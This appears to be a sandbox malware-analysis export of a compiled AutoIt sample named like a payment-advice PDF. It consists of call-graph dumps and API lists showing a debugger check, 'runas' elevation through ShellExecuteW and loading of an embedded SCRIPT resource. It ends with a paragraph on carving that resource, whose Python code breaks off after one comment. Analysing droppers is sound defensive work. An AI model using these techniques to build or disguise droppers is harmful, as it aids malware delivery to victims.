105147->105137 105152 86df6a WriteFile 105147->105152 105148 86e1b2 105205 868af4 58 API calls __getptd_noexit 105148->105205 105154 86dee3 105149->105154 105155 86e17b 105149->105155 105150->105134 105165 86e0ab 105150->105165 105151->105144 105152->105134 105158 86dfb9 105152->105158 105201 868b28 58 API calls __getptd_noexit 105154->105201 105203 868b07 58 API calls 2 library calls 105155->105203 105158->105144 105158->105147 105158->105151 105159 86dee8 105202 868af4 58 API calls __getptd_noexit 105159->105202 105160 86e0b3 WriteFile 105163 86e106 GetLastError 105160->105163 105160->105165 105163->105165 105164 8762ba 60 API calls __write_nolock 105164->105167 105165->105144 105165->105145 105165->105151 105165->105160 105166 877a5e WriteConsoleW CreateFileW __putwch_nolock 105170 86dc5f 105166->105170 105167->105144 105167->105164 105168 86dbf2 WideCharToMultiByte 105167->105168 105167->105170 105200 8635f5 58 API calls __isleadbyte_l 105167->105200 105168->105144 105169 86dc2d WriteFile 105168->105169 105169->105134 105169->105170 105170->105134 105170->105144 105170->105166 105170->105167 105171 86dc87 WriteFile 105170->105171 105171->105134 105171->105170 105172->105078 105173->105094 105174->105080 105175->105096 105176->105095 105177->105094 105178->105080 105179->105088 105180->105094 105181->105105 105182->105101 105184 875c76 105183->105184 105185 875c83 105183->105185 105186 868b28 __lseeki64 58 API calls 105184->105186 105188 875c8f 105185->105188 105189 868b28 __lseeki64 58 API calls 105185->105189 105187 875c7b 105186->105187 105187->105127 105188->105127 105190 875cb0 105189->105190 105191 868db6 __lseeki64 9 API calls 105190->105191 105191->105187 105192->105115 105193->105122 105194->105142 105195->105121 105196->105128 105197->105142 105198->105119 105199->105136 105200->105167 105201->105159 105202->105142 105203->105142 105204->105148 105205->105142 105207 86c600 IsProcessorFeaturePresent 105206->105207 105208 86c5fe 105206->105208 105210 
87590a 105207->105210 105208->105114 105211 8758b9 ___raise_securityfailure 5 API calls 105210->105211 105212 8759ed 105211->105212 105212->105114 105213->105040 105214->105042 105238 86d4c3 105215->105238 105217 870b41 105251 86d43d 59 API calls __lseeki64 105217->105251 105219 870aeb 105219->105217 105220 870b1f 105219->105220 105223 86d4c3 __lseek_nolock 58 API calls 105219->105223 105220->105217 105221 86d4c3 __lseek_nolock 58 API calls 105220->105221 105224 870b2b CloseHandle 105221->105224 105222 870b49 105225 870b6b 105222->105225 105252 868b07 58 API calls 2 library calls 105222->105252 105226 870b16 105223->105226 105224->105217 105227 870b37 GetLastError 105224->105227 105225->105067 105229 86d4c3 __lseek_nolock 58 API calls 105226->105229 105227->105217 105229->105220 105230->105051 105231->105065 105232->105054 105233->105067 105234->105065 105235->105054 105236->105060 105237->105065 105239 86d4e3 105238->105239 105240 86d4ce 105238->105240 105244 86d508 105239->105244 105255 868af4 58 API calls __getptd_noexit 105239->105255 105253 868af4 58 API calls __getptd_noexit 105240->105253 105243 86d4d3 105254 868b28 58 API calls __getptd_noexit 105243->105254 105244->105219 105245 86d512 105256 868b28 58 API calls __getptd_noexit 105245->105256 105247 86d4db 105247->105219 105249 86d51a 105257 868db6 9 API calls __lseeki64 105249->105257 105251->105222 105252->105225 105253->105243 105254->105247 105255->105245 105256->105249 105257->105247 105259 8a3c3e 105258->105259 105260 8a4475 FindFirstFileW 105258->105260 105259->104697 105260->105259 105261 8a448a FindClose 105260->105261 105261->105259 105477 844bb5 105262->105477 105267 87d8e6 105270 844e4a 84 API calls 105267->105270 105268 844e08 LoadLibraryExW 105487 844b6a 105268->105487 105272 87d8ed 105270->105272 105274 844b6a 3 API calls 105272->105274 105275 87d8f5 105274->105275 105513 844f0b 105275->105513 105276 844e2f 105276->105275 105277 844e3b 105276->105277 105279 844e4a 84 API calls 105277->105279 
105281 844e40 105279->105281 105281->104877 105281->104880 105283 87d91c 105521 844ec7 105283->105521 105287 847667 59 API calls 105286->105287 105288 8445b1 105287->105288 105289 847667 59 API calls 105288->105289 105290 8445b9 105289->105290 105291 847667 59 API calls 105290->105291 105292 8445c1 105291->105292 105293 847667 59 API calls 105292->105293 105294 8445c9 105293->105294 105295 87d4d2 105294->105295 105296 8445fd 105294->105296 105297 848047 59 API calls 105295->105297 105298 84784b 59 API calls 105296->105298 105299 87d4db 105297->105299 105300 84460b 105298->105300 105707 847d8c 105299->105707 105703 847d2c 105300->105703 105303 844615 105305 844640 105303->105305 105306 84784b 59 API calls 105303->105306 105304 844680 105690 84784b 105304->105690 105305->105304 105308 84465f 105305->105308 105318 87d4fb 105305->105318 105309 844636 105306->105309 105310 8479f2 59 API calls 105308->105310 105313 847d2c 59 API calls 105309->105313 105315 844669 105310->105315 105311 844691 105316 8446a3 105311->105316 105319 848047 59 API calls 105311->105319 105312 87d5cb 105314 847bcc 59 API calls 105312->105314 105313->105305 105332 87d588 105314->105332 105315->105304 105323 84784b 59 API calls 105315->105323 105317 8446b3 105316->105317 105320 848047 59 API calls 105316->105320 105322 8446ba 105317->105322 105324 848047 59 API calls 105317->105324 105318->105312 105321 87d5b4 105318->105321 105331 87d532 105318->105331 105319->105316 105320->105317 105321->105312 105327 87d59f 105321->105327 105325 848047 59 API calls 105322->105325 105334 8446c1 Mailbox 105322->105334 105323->105304 105324->105322 105325->105334 105326 8479f2 59 API calls 105326->105332 105330 847bcc 59 API calls 105327->105330 105328 87d590 105329 847bcc 59 API calls 105328->105329 105329->105332 105330->105332 105331->105328 105335 87d57b 105331->105335 105332->105304 105332->105326 105711 847924 59 API calls 2 library calls 105332->105711 105334->104910 105336 847bcc 59 API calls 
105335->105336 105336->105332 105338 847e4f 59 API calls 105337->105338 105339 8479fd 105338->105339 105339->104916 105339->104918 105341 847b40 105340->105341 105342 87ec6b 105340->105342 105713 847a51 105341->105713 105719 897bdb 59 API calls _memmove 105342->105719 105345 847b4c 105345->104925 105346 87ec75 105347 848047 59 API calls 105346->105347 105348 87ec7d Mailbox 105347->105348 105350 8a408d 105349->105350 105351 8a4092 105350->105351 105352 8a40a0 105350->105352 105353 848047 59 API calls 105351->105353 105354 847667 59 API calls 105352->105354 105355 8a409b Mailbox 105353->105355 105356 8a40a8 105354->105356 105355->104934 105357 847667 59 API calls 105356->105357 105358 8a40b0 105357->105358 105359 847667 59 API calls 105358->105359 105360 8a40bb 105359->105360 105361 847667 59 API calls 105360->105361 105362 8a40c3 105361->105362 105363 847667 59 API calls 105362->105363 105364 8a40cb 105363->105364 105365 847667 59 API calls 105364->105365 105366 8a40d3 105365->105366 105367 847667 59 API calls 105366->105367 105368 8a40db 105367->105368 105369 847667 59 API calls 105368->105369 105370 8a40e3 105369->105370 105371 84459b 59 API calls 105370->105371 105372 8a40fa 105371->105372 105373 84459b 59 API calls 105372->105373 105374 8a4113 105373->105374 105375 8479f2 59 API calls 105374->105375 105376 8a411f 105375->105376 105377 8a4132 105376->105377 105378 847d2c 59 API calls 105376->105378 105379 8479f2 59 API calls 105377->105379 105378->105377 105380 8a413b 105379->105380 105381 8a414b 105380->105381 105382 847d2c 59 API calls 105380->105382 105383 848047 59 API calls 105381->105383 105382->105381 105384 8a4157 105383->105384 105385 847b2e 59 API calls 105384->105385 105386 8a4163 105385->105386 105720 8a4223 59 API calls 105386->105720 105388 8a4172 105721 8a4223 59 API calls 105388->105721 105390 8a4185 105391 8479f2 59 API calls 105390->105391 105392 8a418f 105391->105392 105393 8a41a6 105392->105393 105394 8a4194 105392->105394 105396 8479f2 59 API 
calls 105393->105396 105395 847cab 59 API calls 105394->105395 105397 8a41a1 105395->105397 105398 8a41af 105396->105398 105401 847b2e 59 API calls 105397->105401 105399 8a41cd 105398->105399 105400 847cab 59 API calls 105398->105400 105402 847b2e 59 API calls 105399->105402 105400->105397 105401->105399 105402->105355 105404 8a9162 __ftell_nolock 105403->105404 105405 860db6 Mailbox 59 API calls 105404->105405 105406 8a91bf 105405->105406 105407 84522e 59 API calls 105406->105407 105408 8a91c9 105407->105408 105409 8a8f5f GetSystemTimeAsFileTime 105408->105409 105410 8a91d4 105409->105410 105411 844ee5 85 API calls 105410->105411 105412 8a91e7 _wcscmp 105411->105412 105413 8a920b 105412->105413 105414 8a92b8 105412->105414 105739 8a9734 105413->105739 105416 8a9734 96 API calls 105414->105416 105431 8a9284 _wcscat 105416->105431 105419 844f0b 74 API calls 105421 8a92dd 105419->105421 105420 8a92c1 105420->104941 105422 844f0b 74 API calls 105421->105422 105424 8a92ed 105422->105424 105423 8a9239 _wcscat _wcscpy 105746 8640fb 58 API calls __wsplitpath_helper 105423->105746 105425 844f0b 74 API calls 105424->105425 105427 8a9308 105425->105427 105428 844f0b 74 API calls 105427->105428 105429 8a9318 105428->105429 105430 844f0b 74 API calls 105429->105430 105432 8a9333 105430->105432 105431->105419 105431->105420 105433 844f0b 74 API calls 105432->105433 105434 8a9343 105433->105434 105435 844f0b 74 API calls 105434->105435 105436 8a9353 105435->105436 105437 844f0b 74 API calls 105436->105437 105438 8a9363 105437->105438 105722 8a98e3 GetTempPathW GetTempFileNameW 105438->105722 105440 8a936f 105441 86525b 115 API calls 105440->105441 105442 8a9380 105441->105442 105442->105420 105445 844f0b 74 API calls 105442->105445 105455 8a943a 105442->105455 105723 864863 105442->105723 105443 8653a6 __fcloseall 83 API calls 105444 8a9445 105443->105444 105446 8a944b DeleteFileW 105444->105446 105447 8a945f 105444->105447 105445->105442 105446->105420 105448 8a9505 CopyFileW 
105447->105448 105452 8a9469 _wcsncpy 105447->105452 105449 8a951b DeleteFileW 105448->105449 105450 8a952d DeleteFileW 105448->105450 105449->105420 105736 8a98a2 CreateFileW 105450->105736 105747 8a8b06 116 API calls __fcloseall 105452->105747 105455->105443 105456 8a94f0 105456->105450 105457 8a94f4 DeleteFileW 105456->105457 105457->105420 105458->104867 105460 847cbf 105459->105460 105461 87ed4a 105459->105461 105766 847c50 105460->105766 105462 848029 59 API calls 105461->105462 105465 87ed55 __wsetenvp _memmove 105462->105465 105464 847cca 105464->104901 105466->104903 105467->104917 105469 847c45 105468->105469 105470 847bd8 __wsetenvp 105468->105470 105471 847d2c 59 API calls 105469->105471 105472 847c13 105470->105472 105473 847bee 105470->105473 105476 847bf6 _memmove 105471->105476 105474 848029 59 API calls 105472->105474 105771 847f27 59 API calls Mailbox 105473->105771 105474->105476 105476->104926 105526 844c03 105477->105526 105480 844bdc 105482 844bf5 105480->105482 105483 844bec FreeLibrary 105480->105483 105481 844c03 2 API calls 105481->105480 105484 86525b 105482->105484 105483->105482 105530 865270 105484->105530 105486 844dfc 105486->105267 105486->105268 105611 844c36 105487->105611 105490 844b8f 105492 844ba1 FreeLibrary 105490->105492 105493 844baa 105490->105493 105491 844c36 2 API calls 105491->105490 105492->105493 105494 844c70 105493->105494 105495 860db6 Mailbox 59 API calls 105494->105495 105496 844c85 105495->105496 105615 84522e 105496->105615 105498 844c91 _memmove 105499 844ccc 105498->105499 105500 844dc1 105498->105500 105501 844d89 105498->105501 105502 844ec7 69 API calls 105499->105502 105629 8a991b 95 API calls 105500->105629 105618 844e89 CreateStreamOnHGlobal 105501->105618 105512 844cd5 105502->105512 105505 844f0b 74 API calls 105505->105512 105507 844d69 105507->105276 105508 87d8a7 105509 844ee5 85 API calls 105508->105509 105510 87d8bb 105509->105510 105511 844f0b 74 API calls 105510->105511 105511->105507 
105512->105505 105512->105507 105512->105508 105624 844ee5 105512->105624 105514 844f1d 105513->105514 105515 87d9cd 105513->105515 105647 8655e2 105514->105647 105518 8a9109 105667 8a8f5f 105518->105667 105520 8a911f 105520->105283 105522 844ed6 105521->105522 105523 87d990 105521->105523 105672 865c60 105522->105672 105525 844ede 105527 844bd0 105526->105527 105528 844c0c LoadLibraryA 105526->105528 105527->105480 105527->105481 105528->105527 105529 844c1d GetProcAddress 105528->105529 105529->105527 105533 86527c __lseeki64 105530->105533 105531 86528f 105579 868b28 58 API calls __getptd_noexit 105531->105579 105533->105531 105535 8652c0 105533->105535 105534 865294 105580 868db6 9 API calls __lseeki64 105534->105580 105549 8704e8 105535->105549 105538 8652c5 105539 8652ce 105538->105539 105540 8652db 105538->105540 105581 868b28 58 API calls __getptd_noexit 105539->105581 105541 865305 105540->105541 105542 8652e5 105540->105542 105564 870607 105541->105564 105582 868b28 58 API calls __getptd_noexit 105542->105582 105546 86529f __lseeki64 @_EH4_CallFilterFunc@8 105546->105486 105550 8704f4 __lseeki64 105549->105550 105551 869c0b __lock 58 API calls 105550->105551 105562 870502 105551->105562 105552 870576 105584 8705fe 105552->105584 105553 87057d 105589 86881d 58 API calls 2 library calls 105553->105589 105556 8705f3 __lseeki64 105556->105538 105557 870584 105557->105552 105590 869e2b InitializeCriticalSectionAndSpinCount 105557->105590 105559 869c93 __mtinitlocknum 58 API calls 105559->105562 105561 8705aa EnterCriticalSection 105561->105552 105562->105552 105562->105553 105562->105559 105587 866c50 59 API calls __lock 105562->105587 105588 866cba LeaveCriticalSection LeaveCriticalSection _doexit 105562->105588 105572 870627 __wopenfile 105564->105572 105565 870641 105595 868b28 58 API calls __getptd_noexit 105565->105595 105567 870646 105596 868db6 9 API calls __lseeki64 105567->105596 105569 87085f 105592 8785a1 105569->105592 105570 865310 105583 865332 
LeaveCriticalSection LeaveCriticalSection _fseek 105570->105583 105572->105565 105578 8707fc 105572->105578 105597 8637cb 60 API calls 2 library calls 105572->105597 105574 8707f5 105574->105578 105598 8637cb 60 API calls 2 library calls 105574->105598 105576 870814 105576->105578 105599 8637cb 60 API calls 2 library calls 105576->105599 105578->105565 105578->105569 105579->105534 105580->105546 105581->105546 105582->105546 105583->105546 105591 869d75 LeaveCriticalSection 105584->105591 105586 870605 105586->105556 105587->105562 105588->105562 105589->105557 105590->105561 105591->105586 105600 877d85 105592->105600 105594 8785ba 105594->105570 105595->105567 105596->105570 105597->105574 105598->105576 105599->105578 105603 877d91 __lseeki64 105600->105603 105601 877da7 105602 868b28 __lseeki64 58 API calls 105601->105602 105604 877dac 105602->105604 105603->105601 105605 877ddd 105603->105605 105606 868db6 __lseeki64 9 API calls 105604->105606 105607 877e4e __wsopen_nolock 109 API calls 105605->105607 105610 877db6 __lseeki64 105606->105610 105608 877df9 105607->105608 105609 877e22 __wsopen_helper LeaveCriticalSection 105608->105609 105609->105610 105610->105594 105612 844b83 105611->105612 105613 844c3f LoadLibraryA 105611->105613 105612->105490 105612->105491 105613->105612 105614 844c50 GetProcAddress 105613->105614 105614->105612 105616 860db6 Mailbox 59 API calls 105615->105616 105617 845240 105616->105617 105617->105498 105619 844ea3 FindResourceExW 105618->105619 105623 844ec0 105618->105623 105620 87d933 LoadResource 105619->105620 105619->105623 105621 87d948 SizeofResource 105620->105621 105620->105623 105622 87d95c LockResource 105621->105622 105621->105623 105622->105623 105623->105499 105625 844ef4 105624->105625 105626 87d9ab 105624->105626 105630 86584d 105625->105630 105628 844f02 105628->105512 105629->105499 105631 865859 __lseeki64 105630->105631 105632 86586b 105631->105632 105633 865891 105631->105633 105643 868b28 58 API calls 
__getptd_noexit 105632->105643 105635 866c11 __lock_file 59 API calls 105633->105635 105637 865897 105635->105637 105636 865870 105644 868db6 9 API calls __lseeki64 105636->105644 105645 8657be 83 API calls 4 library calls 105637->105645 105640 8658a6 105646 8658c8 LeaveCriticalSection LeaveCriticalSection _fseek 105640->105646 105642 86587b __lseeki64 105642->105628 105643->105636 105644->105642 105645->105640 105646->105642 105650 8655fd 105647->105650 105649 844f2e 105649->105518 105651 865609 __lseeki64 105650->105651 105652 86564c 105651->105652 105653 865644 __lseeki64 105651->105653 105658 86561f _memset 105651->105658 105654 866c11 __lock_file 59 API calls 105652->105654 105653->105649 105655 865652 105654->105655 105665 86541d 72 API calls 6 library calls 105655->105665 105663 868b28 58 API calls __getptd_noexit 105658->105663 105659 865639 105664 868db6 9 API calls __lseeki64 105659->105664 105660 865668 105666 865686 LeaveCriticalSection LeaveCriticalSection _fseek 105660->105666 105663->105659 105664->105653 105665->105660 105666->105653 105670 86520a GetSystemTimeAsFileTime 105667->105670 105669 8a8f6e 105669->105520 105671 865238 __aulldiv 105670->105671 105671->105669 105673 865c6c __lseeki64 105672->105673 105674 865c93 105673->105674 105675 865c7e 105673->105675 105677 866c11 __lock_file 59 API calls 105674->105677 105686 868b28 58 API calls __getptd_noexit 105675->105686 105679 865c99 105677->105679 105678 865c83 105687 868db6 9 API calls __lseeki64 105678->105687 105688 8658d0 67 API calls 5 library calls 105679->105688 105682 865ca4 105689 865cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105682->105689 105684 865cb6 105685 865c8e __lseeki64 105684->105685 105685->105525 105686->105678 105687->105685 105688->105682 105689->105684 105691 8478b7 105690->105691 105692 84785a 105690->105692 105693 847d2c 59 API calls 105691->105693 105692->105691 105694 847865 105692->105694 105699 847888 _memmove 105693->105699 105695 847880 105694->105695 
105696 87eb09 105694->105696 105712 847f27 59 API calls Mailbox 105695->105712 105698 848029 59 API calls 105696->105698 105700 87eb13 105698->105700 105699->105311 105701 860db6 Mailbox 59 API calls 105700->105701 105702 87eb33 105701->105702 105704 847d3a 105703->105704 105706 847d43 _memmove 105703->105706 105705 847e4f 59 API calls 105704->105705 105704->105706 105705->105706 105706->105303 105708 847da6 105707->105708 105709 847d99 105707->105709 105710 860db6 Mailbox 59 API calls 105708->105710 105709->105305 105710->105709 105711->105332 105712->105699 105714 847a85 _memmove 105713->105714 105715 847a5f 105713->105715 105714->105345 105715->105714 105716 860db6 Mailbox 59 API calls 105715->105716 105717 847ad4 105716->105717 105718 860db6 Mailbox 59 API calls 105717->105718 105718->105714 105719->105346 105720->105388 105721->105390 105722->105440 105724 86486f __lseeki64 105723->105724 105725 8648a5 105724->105725 105726 86488d 105724->105726 105729 86489d __lseeki64 105724->105729 105727 866c11 __lock_file 59 API calls 105725->105727 105760 868b28 58 API calls __getptd_noexit 105726->105760 105730 8648ab 105727->105730 105729->105442 105748 86470a 105730->105748 105731 864892 105761 868db6 9 API calls __lseeki64 105731->105761 105737 8a98c8 SetFileTime CloseHandle 105736->105737 105738 8a98de 105736->105738 105737->105738 105738->105420 105742 8a9748 __tzset_nolock _wcscmp 105739->105742 105740 8a9109 GetSystemTimeAsFileTime 105740->105742 105741 8a9210 105741->105420 105745 8640fb 58 API calls __wsplitpath_helper 105741->105745 105742->105740 105742->105741 105743 844f0b 74 API calls 105742->105743 105744 844ee5 85 API calls 105742->105744 105743->105742 105744->105742 105745->105423 105746->105431 105747->105456 105751 864719 105748->105751 105755 864737 105748->105755 105749 864727 105763 868b28 58 API calls __getptd_noexit 105749->105763 105751->105749 105751->105755 105758 864751 _memmove 105751->105758 105752 86472c 105764 868db6 9 API calls 
__lseeki64 105752->105764 105762 8648dd LeaveCriticalSection LeaveCriticalSection _fseek 105755->105762 105756 864a3d __flush 78 API calls 105756->105758 105757 8646e6 __flush 58 API calls 105757->105758 105758->105755 105758->105756 105758->105757 105759 86d886 __write 78 API calls 105758->105759 105765 86ae1e 78 API calls 6 library calls 105758->105765 105759->105758 105760->105731 105761->105729 105762->105729 105763->105752 105764->105755 105765->105758 105767 847c5f __wsetenvp 105766->105767 105768 848029 59 API calls 105767->105768 105769 847c70 _memmove 105767->105769 105770 87ed07 _memmove 105768->105770 105769->105464 105771->105476 105772->104721 105773->104719 105774->104614 105775->104614 105776->104609 105777->104613 105778->104617 105779->104613 105780->104637 105781->104642 105782 867c56 105783 867c62 __lseeki64 105782->105783 105819 869e08 GetStartupInfoW 105783->105819 105785 867c67 105821 868b7c GetProcessHeap 105785->105821 105787 867cbf 105788 867cca 105787->105788 105904 867da6 58 API calls 3 library calls 105787->105904 105822 869ae6 105788->105822 105791 867cd0 105792 867cdb __RTC_Initialize 105791->105792 105905 867da6 58 API calls 3 library calls 105791->105905 105843 86d5d2 105792->105843 105795 867cea 105796 867cf6 GetCommandLineW 105795->105796 105906 867da6 58 API calls 3 library calls 105795->105906 105862 874f23 GetEnvironmentStringsW 105796->105862 105800 867cf5 105800->105796 105802 867d10 105803 867d1b 105802->105803 105907 8630b5 58 API calls 3 library calls 105802->105907 105872 874d58 105803->105872 105806 867d21 105807 867d2c 105806->105807 105908 8630b5 58 API calls 3 library calls 105806->105908 105886 8630ef 105807->105886 105810 867d34 105811 867d3f __wwincmdln 105810->105811 105909 8630b5 58 API calls 3 library calls 105810->105909 105892 8447d0 105811->105892 105814 867d53 105815 867d62 105814->105815 105910 863358 58 API calls _doexit 105814->105910 105911 8630e0 58 API calls _doexit 105815->105911 105818 867d67 
                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00843B68
                                                              • IsDebuggerPresent.KERNEL32 ref: 00843B7A
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,009052F8,009052E0,?,?), ref: 00843BEB
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                                • Part of subcall function 0085092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00843C14,009052F8,?,?,?), ref: 0085096E
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00843C6F
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008F7770,00000010), ref: 0087D281
                                                              • SetCurrentDirectoryW.KERNEL32(?,009052F8,?,?,?), ref: 0087D2B9
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,008F4260,009052F8,?,?,?), ref: 0087D33F
                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0087D346
                                                                • Part of subcall function 00843A46: GetSysColorBrush.USER32(0000000F), ref: 00843A50
                                                                • Part of subcall function 00843A46: LoadCursorW.USER32(00000000,00007F00), ref: 00843A5F
                                                                • Part of subcall function 00843A46: LoadIconW.USER32(00000063), ref: 00843A76
                                                                • Part of subcall function 00843A46: LoadIconW.USER32(000000A4), ref: 00843A88
                                                                • Part of subcall function 00843A46: LoadIconW.USER32(000000A2), ref: 00843A9A
                                                                • Part of subcall function 00843A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00843AC0
                                                                • Part of subcall function 00843A46: RegisterClassExW.USER32(?), ref: 00843B16
                                                                • Part of subcall function 008439D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00843A03
                                                                • Part of subcall function 008439D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00843A24
                                                                • Part of subcall function 008439D5: ShowWindow.USER32(00000000,?,?), ref: 00843A38
                                                                • Part of subcall function 008439D5: ShowWindow.USER32(00000000,?,?), ref: 00843A41
                                                                • Part of subcall function 0084434A: _memset.LIBCMT ref: 00844370
                                                                • Part of subcall function 0084434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00844415
                                                              Strings
                                                              • This is a third-party compiled AutoIt script., xrefs: 0087D279
                                                              • runas, xrefs: 0087D33A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                              • API String ID: 529118366-3287110873
                                                              • Opcode ID: ee0824aa38ab80534c009069e8942448b858d525e12bac2a8aa908a2515f9bfc
                                                              • Instruction ID: cf7a278de521a3629ea9bb43022f582cc0eff54416e508804123d911e0eba46b
                                                              • Opcode Fuzzy Hash: ee0824aa38ab80534c009069e8942448b858d525e12bac2a8aa908a2515f9bfc
                                                              • Instruction Fuzzy Hash: ED51BF3190824DAEEF11ABBCDC45EAE7B79FF45714F008065F521E22A2DB709646DF22

                                                              Control-flow Graph

[Control-flow graph for the function at 008449A0: the rendered graph, including its executed / not-executed block colouring, is not recoverable from text. Its nodes reach GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, GetSystemInfo and FreeLibrary, as listed under APIs below.]
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 008449CD
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              • GetCurrentProcess.KERNEL32(?,008CFAEC,00000000,00000000,?), ref: 00844A9A
                                                              • IsWow64Process.KERNEL32(00000000), ref: 00844AA1
                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00844AE7
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00844AF2
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00844B23
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00844B2F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                              • String ID:
                                                              • API String ID: 1986165174-0
                                                              • Opcode ID: 1aa66f3c13beab755649fcb9a5669ebd1e1d755522e2abe90bd4978c3193962a
                                                              • Instruction ID: 079570504eba0165412be3bcd890b1262acb560046b2e9af74a96f90f042987e
                                                              • Opcode Fuzzy Hash: 1aa66f3c13beab755649fcb9a5669ebd1e1d755522e2abe90bd4978c3193962a
                                                              • Instruction Fuzzy Hash: 4A91B3319897C8DAC731CB6885506AABFF5FF2A304B485D6ED0CBD3A42D630E508C75A

                                                              Control-flow Graph

[Control-flow graph for the function at 00844E89: the rendered graph, including its executed / not-executed block colouring, is not recoverable from text. Its nodes reach CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource, as listed under APIs below.]
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00844D8E,?,?,00000000,00000000), ref: 00844E99
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00844D8E,?,?,00000000,00000000), ref: 00844EB0
                                                              • LoadResource.KERNEL32(?,00000000,?,?,00844D8E,?,?,00000000,00000000,?,?,?,?,?,?,00844E2F), ref: 0087D937
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00844D8E,?,?,00000000,00000000,?,?,?,?,?,?,00844E2F), ref: 0087D94C
                                                              • LockResource.KERNEL32(00844D8E,?,?,00844D8E,?,?,00000000,00000000,?,?,?,?,?,?,00844E2F,00000000), ref: 0087D95F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: 20ba5a4dc4234e3de0b16f8344aa7b1c914781268ed66e63061c23aef7787c68
                                                              • Instruction ID: 92645e991e5a77d44c4a949cfac1e8da08936dbfd71095c853cf5eedf32ec3d6
                                                              • Opcode Fuzzy Hash: 20ba5a4dc4234e3de0b16f8344aa7b1c914781268ed66e63061c23aef7787c68
                                                              • Instruction Fuzzy Hash: 18112A75240705BFE7218B65EC48F67BBBEFBC5B61F20826CF616D6250DB71E8008A60
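The five calls in the function above (CreateStreamOnHGlobal, FindResourceExW with lpType 0x0000000A and lpName SCRIPT, LoadResource, SizeofResource, LockResource) are the AutoIt stub reading its compiled script out of an RT_RCDATA resource named SCRIPT and wrapping it in a stream. The Python below is an added example, not code from the report, from Joe Sandbox or from AutoIt: it performs the same type -> name -> language lookup offline by walking the PE resource directory, so the script blob can be carved from the file for static analysis without executing the sample. The function names, the synthetic .rsrc builder and the payload bytes are this example's own constructions; the PE32/PE32+ header offsets are the standard ones.

```python
# Added example: offline equivalent of FindResourceExW(h, RT_RCDATA, L"SCRIPT", 0) + LockResource.
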